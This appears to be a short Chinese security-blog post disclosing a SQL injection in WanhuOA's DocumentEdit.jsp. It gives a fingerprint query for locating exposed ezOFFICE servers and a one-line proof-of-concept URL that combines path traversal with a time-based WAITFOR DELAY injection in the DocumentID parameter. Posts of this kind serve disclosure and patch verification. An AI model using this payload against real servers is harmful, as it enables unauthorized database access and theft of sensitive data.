WanhuOA DocumentEdit.jsp SQL注入漏洞
# WanhuOA DocumentEdit.jsp SQL注入漏洞
## 漏洞描述
WanhuOA DocumentEdit.jsp文件存在SQL注入漏洞,攻击者通过发送特殊的请求包可以对数据库进行SQL注入,获取服务器敏感信息
## 漏...
WanhuOA DocumentEdit.jsp SQL注入漏洞
漏洞描述
WanhuOA DocumentEdit.jsp文件存在SQL注入漏洞,攻击者通过发送特殊的请求包可以对数据库进行SQL注入,获取服务器敏感信息
漏洞影响
WanhuOA
网络测绘
app="Wanhu网络-ezOFFICE"
漏洞复现
产品页面
验证POC
/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:5'--
- 发表于 2024-07-12 18:44:35
- 阅读 ( 2080 )
- 分类:OA产品
带头大哥
456 篇文章